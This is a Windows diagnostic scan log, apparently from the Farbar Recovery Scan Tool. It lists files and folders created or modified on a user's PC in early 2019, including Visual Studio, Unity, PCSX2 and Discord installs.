2019-02-20 21:44 - 2019-02-20 21:47 - 003141416 _____ (Alexander Roshal) C:\Users\Michael\Downloads\winrar-x64-57b1.exe
2019-02-20 21:39 - 2019-02-20 21:39 - 002211051 _____ C:\Users\Michael\Downloads\scph10000.zip
2019-02-20 21:02 - 2019-02-20 21:14 - 000000178 _____ C:\Users\Michael\Desktop\PCSX2 Best Configuration.txt
2019-02-20 20:36 - 2019-02-20 20:36 - 000000000 ____D C:\Users\Michael\Documents\PCSX2
2019-02-20 20:19 - 2019-02-20 20:20 - 000000000 ____D C:\Program Files (x86)\PCSX2 1.4.0
2019-02-20 20:19 - 2019-02-20 20:19 - 000001943 _____ C:\Users\Public\Desktop\PCSX2 1.4.0.lnk
2019-02-20 20:19 - 2019-02-20 20:19 - 000000000 ____D C:\Windows\SysWOW64\directx
2019-02-20 20:19 - 2019-02-20 20:19 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PCSX2
2019-02-20 20:14 - 2019-02-20 20:15 - 017837152 _____ C:\Users\Michael\Downloads\pcsx2-1.4.0-setup.exe
2019-02-20 18:32 - 2019-02-23 21:06 - 000000000 ____D C:\Users\Michael\AppData\Roaming\Discord
2019-02-20 18:32 - 2019-02-20 18:32 - 000002136 _____ C:\Users\Michael\Desktop\Discord.lnk
2019-02-20 18:32 - 2019-02-20 18:32 - 000000000 ____D C:\Users\Michael\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Discord Inc
2019-02-20 18:32 - 2019-02-20 18:32 - 000000000 ____D C:\Users\Michael\AppData\Local\SquirrelTemp
2019-02-20 18:32 - 2019-02-20 18:32 - 000000000 ____D C:\Users\Michael\AppData\Local\Discord
2019-02-20 03:33 - 2019-02-20 03:33 - 000096393 _____ C:\Windows\uninstaller.dat
2019-02-02 19:20 - 2019-02-15 22:48 - 000001590 _____ C:\Users\Public\Desktop\DOSBox 0.74.lnk
2019-02-02 19:20 - 2019-02-15 22:48 - 000000000 ____D C:\DOSBox-0.74
2019-02-02 19:20 - 2019-02-02 19:37 - 000000000 ____D C:\Users\Michael\AppData\Local\DOSBox
2019-02-02 19:20 - 2019-02-02 19:20 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\DOSBox-0.74
2019-02-02 19:01 - 2019-02-02 19:11 - 000000000 ____D C:\ProgramData\Unity
2019-02-02 19:01 - 2019-02-02 19:01 - 000000000 ____D C:\Users\Michael\AppData\Roaming\Unity
2019-02-02 19:01 - 2019-02-02 19:01 - 000000000 ____D C:\Users\Michael\AppData\LocalLow\Unity
2019-02-02 19:01 - 2019-02-02 19:01 - 000000000 ____D C:\Users\Michael\AppData\Local\Unity
2019-02-02 14:50 - 2019-02-02 14:50 - 000000000 ____D C:\Users\Michael\AppData\Roaming\Adobe
2019-02-02 14:50 - 2019-02-02 14:50 - 000000000 ____D C:\Users\Michael\AppData\LocalLow\Adobe
2019-02-02 14:47 - 2019-02-15 22:46 - 000004476 _____ C:\Windows\System32\Tasks\Adobe Acrobat Update Task
2019-02-02 14:46 - 2019-02-23 21:06 - 000002441 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acrobat Reader DC.lnk
2019-02-02 14:46 - 2019-02-06 19:31 - 000000000 ____D C:\ProgramData\Adobe
2019-02-02 14:46 - 2019-02-02 14:46 - 000000000 ____D C:\Program Files (x86)\Adobe
2019-02-02 14:38 - 2019-02-02 14:50 - 000000000 ____D C:\Users\Michael\AppData\Local\Adobe
2019-02-02 13:45 - 2019-02-02 13:45 - 000008192 _____ C:\Windows\SysWOW64\srvany.exe
2019-02-02 13:42 - 2019-02-02 13:42 - 000000000 ____D C:\Windows\System32\Tasks\OfficeSoftwareProtectionPlatform
2019-02-02 13:42 - 2019-02-02 13:42 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\SharePoint
2019-02-02 13:42 - 2019-02-02 13:42 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office
2019-02-02 13:42 - 2019-02-02 13:42 - 000000000 ____D C:\Program Files\Microsoft Synchronization Services
2019-02-02 13:42 - 2019-02-02 13:42 - 000000000 ____D C:\Program Files\Common Files\DESIGNER
2019-02-02 13:41 - 2019-02-02 13:41 - 000000000 ____D C:\Windows\PCHEALTH
2019-02-02 13:41 - 2019-02-02 13:41 - 000000000 ____D C:\Program Files\Microsoft Sync Framework
2019-02-02 13:41 - 2019-02-02 13:41 - 000000000 ____D C:\Program Files\Microsoft SQL Server Compact Edition
2019-02-02 13:40 - 2019-02-02 13:41 - 000000000 ____D C:\Program Files\Microsoft Office
2019-02-02 13:40 - 2019-02-02 13:40 - 000000000 ____D C:\Users\Michael\AppData\Local\Microsoft Help
2019-02-02 13:40 - 2019-02-02 13:40 - 000000000 ____D C:\Program Files\Microsoft Analysis Services
2019-02-02 13:40 - 2019-02-02 13:40 - 000000000 ____D C:\Program Files (x86)\Microsoft Visual Studio 8
2019-02-02 13:40 - 2019-02-02 13:40 - 000000000 ____D C:\Program Files (x86)\Microsoft Office
2019-02-02 13:40 - 2019-02-02 13:40 - 000000000 ____D C:\Program Files (x86)\Microsoft Analysis Services
2019-02-02 13:39 - 2019-02-02 13:39 - 000000000 __RHD C:\MSOCache
2019-02-02 13:09 - 2019-02-02 13:09 - 000000000 ____D C:\Users\Michael\AppData\Roaming\JCreator
2019-02-02 13:09 - 2019-02-02 13:09 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\JCreator LE
2019-02-02 13:09 - 2019-02-02 13:09 - 000000000 ____D C:\ProgramData\JCreator
2019-02-02 13:09 - 2019-02-02 13:09 - 000000000 ____D C:\Program Files (x86)\Xinox Software
2019-02-02 13:01 - 2019-02-02 13:01 - 000000000 ____D C:\Users\Michael\AppData\LocalLow\Oracle
2019-02-02 13:01 - 2019-02-02 13:01 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java Development Kit
2019-02-02 13:00 - 2019-02-02 13:06 - 000000000 ____D C:\ProgramData\Oracle
2019-02-02 13:00 - 2019-02-02 13:01 - 000166248 _____ (Oracle Corporation) C:\Windows\system32\WindowsAccessBridge-64.dll
2019-02-02 13:00 - 2019-02-02 13:01 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java
2019-02-02 13:00 - 2019-02-02 13:01 - 000000000 ____D C:\Program Files\Java
2019-02-02 13:00 - 2019-02-02 13:00 - 000000000 ____D C:\Users\Michael\AppData\Roaming\Sun
2019-02-02 13:00 - 2019-02-02 13:00 - 000000000 ____D C:\Users\Michael\AppData\LocalLow\Sun
2019-02-02 12:42 - 2019-02-02 12:42 - 000000000 ____D C:\Users\Michael\AppData\LocalLow\Temp
2019-02-02 12:41 - 2019-02-02 12:41 - 000000000 ____D C:\Users\Michael\AppData\Roaming\NuGet
2019-02-02 12:34 - 2019-02-02 12:34 - 000001471 _____ C:\Users\Michael\Desktop\Visual Studio 2017.lnk
2019-02-02 12:32 - 2019-02-02 12:32 - 000000000 ____D C:\Users\Michael\source
2019-02-02 12:32 - 2019-02-02 12:32 - 000000000 ____D C:\Users\Michael\AppData\Roaming\Microsoft Corporation
2019-02-02 12:32 - 2019-02-02 12:32 - 000000000 ____D C:\Users\Michael\AppData\Local\Xamarin
2019-02-02 12:30 - 2019-02-02 12:36 - 000000000 ____D C:\Users\Michael\AppData\Local\.IdentityService
2019-02-02 11:33 - 2019-02-02 12:41 - 000000000 ____D C:\Users\Michael\Documents\Visual Studio 2017
2019-02-02 11:24 - 2019-02-02 11:24 - 000000000 ____D C:\Users\Michael\.cordova
2019-02-02 11:24 - 2019-02-02 11:24 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Unity 2018.3.0f2 (64-bit)
2019-02-02 11:22 - 2019-02-02 11:22 - 000000000 ____D C:\Program Files\Unity
2019-02-02 09:44 - 2019-02-02 09:44 - 000000000 ____D C:\Users\Michael\.android
2019-02-02 09:44 - 2019-02-02 09:44 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Visual Studio 2017 Tools for Unity
2019-02-02 09:44 - 2019-02-02 09:44 - 000000000 ____D C:\Program Files (x86)\Microsoft Visual Studio Tools for Unity
2019-02-02 08:53 - 2019-02-02 08:53 - 000000000 ____D C:\Program Files (x86)\Android
2019-02-02 08:52 - 2019-02-02 08:52 - 000000000 ____D C:\Program Files\Android
2019-02-02 08:41 - 2019-02-02 08:41 - 000000000 ____D C:\Program Files (x86)\Xamarin
2019-02-02 07:57 - 2019-02-02 07:57 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Azure
2019-02-02 07:57 - 2019-02-02 07:57 - 000000000 ____D C:\ProgramData\dftmp
2019-02-02 07:57 - 2019-02-02 07:57 - 000000000 ____D C:\Program Files\VS2012Schemas
2019-02-02 07:57 - 2019-02-02 07:57 - 000000000 ____D C:\Program Files\VS2010Schemas
2019-02-02 07:57 - 2019-02-02 07:57 - 000000000 ____D C:\Program Files\Microsoft SDKs
2019-02-02 07:57 - 2019-02-02 07:57 - 000000000 ____D C:\Program Files\IIS
2019-02-02 07:57 - 2019-02-02 07:57 - 000000000 ____D C:\Program Files (x86)\IIS
2019-02-02 07:37 - 2019-02-02 07:37 - 000000000 ____D C:\Program Files (x86)\Windows Phone Kits
2019-02-02 06:31 - 2019-02-02 06:31 - 000000000 ____D C:\ProgramData\Windows App Certification Kit
2019-02-02 06:30 - 2019-02-02 06:31 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Kits
2019-02-02 06:30 - 2019-02-02 06:30 - 000000000 ____D C:\Program Files\Application Verifier
2019-02-02 06:30 - 2019-02-02 06:30 - 000000000 ____D C:\Program Files (x86)\Application Verifier
2019-02-02 03:17 - 2019-02-02 03:17 - 000000000 ____D C:\Program Files\Windows Kits
2019-02-02 02:37 - 2019-02-02 02:37 - 005549504 _____ (Microsoft Corporation) C:\Windows\system32\ntoskrnl.exe
2019-02-02 02:37 - 2019-02-02 02:37 - 003969472 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntkrnlpa.exe
2019-02-02 02:37 - 2019-02-02 02:37 - 003914176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntoskrnl.exe
2019-02-02 02:37 - 2019-02-02 02:37 - 001732032 _____ (Microsoft Corporation) C:\Windows\system32\ntdll.dll
2019-02-02 02:37 - 2019-02-02 02:37 - 001292192 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntdll.dll
2019-02-02 02:37 - 2019-02-02 02:37 - 001161216 _____ (Microsoft Corporation) C:\Windows\system32\kernel32.dll
2019-02-02 02:37 - 2019-02-02 02:37 - 001114112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kernel32.dll
2019-02-02 02:37 - 2019-02-02 02:37 - 000878080 _____ (Microsoft Corporation) C:\Windows\system32\advapi32.dll
2019-02-02 02:37 - 2019-02-02 02:37 - 000859648 _____ (Microsoft Corporation) C:\Windows\system32\tdh.dll
2019-02-02 02:37 - 2019-02-02 02:37 - 000640512 _____ (Microsoft Corporation) C:\Windows\SysWOW64\advapi32.dll
2019-02-02 02:37 - 2019-02-02 02:37 - 000619520 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tdh.dll
2019-02-02 02:37 - 2019-02-02 02:37 - 000424448 _____ (Microsoft Corporation) C:\Windows\system32\KernelBase.dll
2019-02-02 02:37 - 2019-02-02 02:37 - 000362496 _____ (Microsoft Corporation) C:\Windows\system32\wow64win.dll
2019-02-02 02:37 - 2019-02-02 02:37 - 000338432 _____ (Microsoft Corporation) C:\Windows\system32\conhost.exe
2019-02-02 02:37 - 2019-02-02 02:37 - 000274944 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KernelBase.dll
2019-02-02 02:37 - 2019-02-02 02:37 - 000243712 _____ (Microsoft Corporation) C:\Windows\system32\wow64.dll
2019-02-02 02:37 - 2019-02-02 02:37 - 000215040 _____ (Microsoft Corporation) C:\Windows\system32\winsrv.dll
2019-02-02 02:37 - 2019-02-02 02:37 - 000112640 _____ (Microsoft Corporation) C:\Windows\system32\smss.exe
2019-02-02 02:37 - 2019-02-02 02:37 - 000043520 _____ (Microsoft Corporation) C:\Windows\system32\csrsrv.dll
2019-02-02 02:37 - 2019-02-02 02:37 - 000025600 _____ (Microsoft Corporation) C:\Windows\SysWOW64\setup16.exe
2019-02-02 02:37 - 2019-02-02 02:37 - 000016384 _____ (Microsoft Corporation) C:\Windows\system32\ntvdm64.dll
2019-02-02 02:37 - 2019-02-02 02:37 - 000014336 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntvdm64.dll
2019-02-02 02:37 - 2019-02-02 02:37 - 000013312 _____ (Microsoft Corporation) C:\Windows\system32\wow64cpu.dll
2019-02-02 02:37 - 2019-02-02 02:37 - 000007680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\instnm.exe
2019-02-02 02:37 - 2019-02-02 02:37 - 000006656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\apisetschema.dll
2019-02-02 02:37 - 2019-02-02 02:37 - 000006144 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-security-base-l1-1-0.dll
2019-02-02 02:37 - 2019-02-02 02:37 - 000006144 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-security-base-l1-1-0.dll
2019-02-02 02:37 - 2019-02-02 02:37 - 000005120 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-file-l1-1-0.dll
2019-02-02 02:37 - 2019-02-02 02:37 - 000005120 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-file-l1-1-0.dll
2019-02-02 02:37 - 2019-02-02 02:37 - 000005120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wow32.dll
2019-02-02 02:37 - 2019-02-02 02:37 - 000004608 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-threadpool-l1-1-0.dll
2019-02-02 02:37 - 2019-02-02 02:37 - 000004608 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-processthreads-l1-1-0.dll
2019-02-02 02:37 - 2019-02-02 02:37 - 000004608 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-threadpool-l1-1-0.dll
2019-02-02 02:37 - 2019-02-02 02:37 - 000004608 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-processthreads-l1-1-0.dll
2019-02-02 02:37 - 2019-02-02 02:37 - 000004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-sysinfo-l1-1-0.dll
2019-02-02 02:37 - 2019-02-02 02:37 - 000004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-synch-l1-1-0.dll
2019-02-02 02:37 - 2019-02-02 02:37 - 000004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-misc-l1-1-0.dll
2019-02-02 02:37 - 2019-02-02 02:37 - 000004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-localregistry-l1-1-0.dll
2019-02-02 02:37 - 2019-02-02 02:37 - 000004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-localization-l1-1-0.dll
2019-02-02 02:37 - 2019-02-02 02:37 - 000004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-sysinfo-l1-1-0.dll
2019-02-02 02:37 - 2019-02-02 02:37 - 000004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-synch-l1-1-0.dll
2019-02-02 02:37 - 2019-02-02 02:37 - 000004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-localregistry-l1-1-0.dll
2019-02-02 02:37 - 2019-02-02 02:37 - 000004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-localization-l1-1-0.dll
2019-02-02 02:37 - 2019-02-02 02:37 - 000003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-xstate-l1-1-0.dll
2019-02-02 02:37 - 2019-02-02 02:37 - 000003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-processenvironment-l1-1-0.dll
2019-02-02 02:37 - 2019-02-02 02:37 - 000003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-namedpipe-l1-1-0.dll
2019-02-02 02:37 - 2019-02-02 02:37 - 000003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-memory-l1-1-0.dll
2019-02-02 02:37 - 2019-02-02 02:37 - 000003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-libraryloader-l1-1-0.dll
2019-02-02 02:37 - 2019-02-02 02:37 - 000003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0.dll
2019-02-02 02:37 - 2019-02-02 02:37 - 000003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-heap-l1-1-0.dll
2019-02-02 02:37 - 2019-02-02 02:37 - 000003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-rtlsupport-l1-1-0.dll
2019-02-02 02:37 - 2019-02-02 02:37 - 000003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-processenvironment-l1-1-0.dll
2019-02-02 02:37 - 2019-02-02 02:37 - 000003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-namedpipe-l1-1-0.dll
2019-02-02 02:37 - 2019-02-02 02:37 - 000003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-misc-l1-1-0.dll
2019-02-02 02:37 - 2019-02-02 02:37 - 000003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-memory-l1-1-0.dll
2019-02-02 02:37 - 2019-02-02 02:37 - 000003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-libraryloader-l1-1-0.dll
2019-02-02 02:37 - 2019-02-02 02:37 - 000003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-heap-l1-1-0.dll
2019-02-02 02:37 - 2019-02-02 02:37 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-util-l1-1-0.dll
2019-02-02 02:37 - 2019-02-02 02:37 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-string-l1-1-0.dll
2019-02-02 02:37 - 2019-02-02 02:37 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-rtlsupport-l1-1-0.dll
2019-02-02 02:37 - 2019-02-02 02:37 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-profile-l1-1-0.dll
2019-02-02 02:37 - 2019-02-02 02:37 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-io-l1-1-0.dll
2019-02-02 02:37 - 2019-02-02 02:37 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-handle-l1-1-0.dll
2019-02-02 02:37 - 2019-02-02 02:37 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-fibers-l1-1-0.dll
2019-02-02 02:37 - 2019-02-02 02:37 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-errorhandling-l1-1-0.dll
2019-02-02 02:37 - 2019-02-02 02:37 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-delayload-l1-1-0.dll
2019-02-02 02:37 - 2019-02-02 02:37 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-debug-l1-1-0.dll
2019-02-02 02:37 - 2019-02-02 02:37 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-datetime-l1-1-0.dll
2019-02-02 02:37 - 2019-02-02 02:37 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-console-l1-1-0.dll
2019-02-02 02:37 - 2019-02-02 02:37 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-xstate-l1-1-0.dll
2019-02-02 02:37 - 2019-02-02 02:37 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-util-l1-1-0.dll
2019-02-02 02:37 - 2019-02-02 02:37 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-string-l1-1-0.dll
2019-02-02 02:37 - 2019-02-02 02:37 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-profile-l1-1-0.dll
2019-02-02 02:37 - 2019-02-02 02:37 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-io-l1-1-0.dll
2019-02-02 02:37 - 2019-02-02 02:37 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-interlocked-l1-1-0.dll
2019-02-02 02:37 - 2019-02-02 02:37 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-handle-l1-1-0.dll
2019-02-02 02:37 - 2019-02-02 02:37 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-fibers-l1-1-0.dll
2019-02-02 02:37 - 2019-02-02 02:37 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-errorhandling-l1-1-0.dll
2019-02-02 02:37 - 2019-02-02 02:37 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-delayload-l1-1-0.dll
2019-02-02 02:37 - 2019-02-02 02:37 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-debug-l1-1-0.dll
2019-02-02 02:37 - 2019-02-02 02:37 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-datetime-l1-1-0.dll
2019-02-02 02:37 - 2019-02-02 02:37 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-console-l1-1-0.dll
2019-02-02 02:37 - 2019-02-02 02:37 - 000002048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\user.exe
2019-02-02 02:37 - 2019-02-02 02:37 - 000000000 ____D C:\Program Files (x86)\Microsoft Web Tools
2019-02-02 01:08 - 2019-02-02 02:37 - 000000000 ____D C:\Program Files\IIS Express
2019-02-02 01:08 - 2019-02-02 02:37 - 000000000 ____D C:\Program Files (x86)\IIS Express
2019-02-02 01:07 - 2019-02-02 01:07 - 000000000 ____D C:\Program Files\Microsoft ASP.NET Core Runtime Package Store
2019-02-02 00:52 - 2019-02-02 00:52 - 000000000 ____D C:\Program Files (x86)\NuGet
2019-02-02 00:51 - 2019-02-02 01:07 - 000000000 ____D C:\Program Files\dotnet
2019-02-01 23:52 - 2019-02-02 03:13 - 000000000 ____D C:\Windows\SysWOW64\3082
2019-02-01 23:52 - 2019-02-02 03:13 - 000000000 ____D C:\Windows\SysWOW64\2052
2019-02-01 23:52 - 2019-02-02 03:13 - 000000000 ____D C:\Windows\SysWOW64\1055
2019-02-01 23:52 - 2019-02-02 03:13 - 000000000 ____D C:\Windows\SysWOW64\1049
2019-02-01 23:52 - 2019-02-02 03:13 - 000000000 ____D C:\Windows\SysWOW64\1046
2019-02-01 23:52 - 2019-02-02 03:13 - 000000000 ____D C:\Windows\SysWOW64\1045
2019-02-01 23:52 - 2019-02-02 03:13 - 000000000 ____D C:\Windows\SysWOW64\1042
2019-02-01 23:52 - 2019-02-02 03:13 - 000000000 ____D C:\Windows\SysWOW64\1041
2019-02-01 23:52 - 2019-02-02 03:13 - 000000000 ____D C:\Windows\SysWOW64\1040
2019-02-01 23:52 - 2019-02-02 03:13 - 000000000 ____D C:\Windows\SysWOW64\1036
2019-02-01 23:52 - 2019-02-02 03:13 - 000000000 ____D C:\Windows\SysWOW64\1033
2019-02-01 23:52 - 2019-02-02 03:13 - 000000000 ____D C:\Windows\SysWOW64\1031
2019-02-01 23:52 - 2019-02-02 03:13 - 000000000 ____D C:\Windows\SysWOW64\1029
2019-02-01 23:52 - 2019-02-02 03:13 - 000000000 ____D C:\Windows\SysWOW64\1028
2019-02-01 23:52 - 2019-02-02 03:13 - 000000000 ____D C:\Windows\system32\3082
2019-02-01 23:52 - 2019-02-02 03:13 - 000000000 ____D C:\Windows\system32\2052
2019-02-01 23:52 - 2019-02-02 03:13 - 000000000 ____D C:\Windows\system32\1055
2019-02-01 23:52 - 2019-02-02 03:13 - 000000000 ____D C:\Windows\system32\1049
2019-02-01 23:52 - 2019-02-02 03:13 - 000000000 ____D C:\Windows\system32\1046
2019-02-01 23:52 - 2019-02-02 03:13 - 000000000 ____D C:\Windows\system32\1045
2019-02-01 23:52 - 2019-02-02 03:13 - 000000000 ____D C:\Windows\system32\1042
2019-02-01 23:52 - 2019-02-02 03:13 - 000000000 ____D C:\Windows\system32\1041
2019-02-01 23:52 - 2019-02-02 03:13 - 000000000 ____D C:\Windows\system32\1040
2019-02-01 23:52 - 2019-02-02 03:13 - 000000000 ____D C:\Windows\system32\1036
2019-02-01 23:52 - 2019-02-02 03:13 - 000000000 ____D C:\Windows\system32\1033
2019-02-01 23:52 - 2019-02-02 03:13 - 000000000 ____D C:\Windows\system32\1031
2019-02-01 23:52 - 2019-02-02 03:13 - 000000000 ____D C:\Windows\system32\1029
2019-02-01 23:52 - 2019-02-02 03:13 - 000000000 ____D C:\Windows\system32\1028
2019-02-01 23:52 - 2019-02-01 23:52 - 000000000 ____D C:\Program Files (x86)\Entity Framework Tools
2019-02-01 23:47 - 2019-02-01 23:47 - 000001715 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Blend for Visual Studio 2017.lnk
2019-02-01 21:36 - 1998-10-29 16:45 - 000306688 _____ (InstallShield Software Corporation) C:\Windows\IsUninst.exe
2019-02-01 20:50 - 2019-02-01 20:50 - 000000000 ____D C:\Users\Michael\AppData\Roaming\Steam
2019-02-01 20:50 - 2019-02-01 20:50 - 000000000 ____D C:\Users\Michael\AppData\Local\CAPCOM
2019-02-01 20:42 - 2019-02-02 02:37 - 000000000 ____D C:\Program Files\Microsoft SQL Server
2019-02-01 20:41 - 2019-02-02 02:37 - 000000000 ____D C:\Program Files (x86)\Microsoft SQL Server
2019-02-01 20:36 - 2019-02-18 20:43 - 000001099 _____ C:\Users\Michael\Desktop\Resident Evil HD Remaster.lnk
2019-02-01 20:32 - 2019-02-01 20:32 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Resident Evil HD Remaster
2019-02-01 20:26 - 2019-02-01 20:36 - 000000000 ____D C:\Program Files (x86)\Resident Evil HD Remaster
2019-02-01 20:23 - 2019-02-01 20:23 - 000003246 _____ C:\Windows\System32\Tasks\SidebarExecute
2019-02-01 19:56 - 1999-12-12 00:00 - 1706336256 _____ C:\Users\Michael\Desktop\RDN-E-RMSTRHD-CompucaliTV.iso
2019-02-01 18:28 - 2019-02-02 07:57 - 000000000 ____D C:\Program Files (x86)\Microsoft SDKs
2019-02-01 18:28 - 2019-02-02 06:30 - 000000000 ____D C:\Program Files (x86)\Windows Kits
2019-02-01 18:26 - 2019-02-01 18:26 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Visual Studio 2017
2019-02-01 18:25 - 2019-02-01 18:25 - 000001471 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Visual Studio 2017.lnk
2019-02-01 18:12 - 2019-02-02 07:14 - 000000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2019-02-01 18:12 - 2019-02-01 18:12 - 004296704 _____ (Microsoft Corporation) C:\Windows\system32\D3DCompiler_47.dll
2019-02-01 18:12 - 2019-02-01 18:12 - 003550208 _____ (Microsoft Corporation) C:\Windows\SysWOW64\D3DCompiler_47.dll
2019-02-01 18:10 - 2019-02-01 22:59 - 000001286 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Visual Studio Installer.lnk
2019-02-01 18:09 - 2019-02-02 12:27 - 000000000 ____D C:\Users\Michael\AppData\Roaming\Visual Studio Setup
2019-02-01 18:09 - 2019-02-01 23:31 - 000000000 ____D C:\Program Files (x86)\Microsoft Visual Studio
2019-02-01 18:09 - 2019-02-01 18:09 - 000000000 ____D C:\Users\Michael\AppData\Roaming\vstelemetry
2019-02-01 18:09 - 2019-02-01 18:09 - 000000000 ____D C:\Users\Michael\AppData\Roaming\Microsoft Visual Studio
2019-02-01 18:09 - 2019-02-01 18:09 - 000000000 ____D C:\Users\Michael\AppData\Local\ServiceHub
2019-02-01 18:05 - 2019-02-01 18:05 - 000000000 ____D C:\ProgramData\Microsoft Visual Studio

==================== One month (modified) ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2019-03-01 13:40 - 2009-07-13 23:45 - 000026352 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2019-03-01 13:40 - 2009-07-13 23:45 - 000026352 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2019-03-01 13:37 - 2011-04-12 04:10 - 000747394 _____ C:\Windows\system32\perfh00A.dat
2019-03-01 13:37 - 2011-04-12 04:10 - 000158866 _____ C:\Windows\system32\perfc00A.dat
2019-03-01 13:37 - 2009-07-14 00:13 - 001676878 _____ C:\Windows\system32\PerfStringBackup.INI
2019-03-01 13:37 - 2009-07-13 22:20 - 000000000 ____D C:\Windows\inf
2019-03-01 13:33 - 2018-11-13 12:59 - 000000000 ____D C:\ProgramData\NVIDIA
2019-03-01 13:33 - 2009-07-14 00:08 - 000000006 ____H C:\Windows\Tasks\SA.DAT
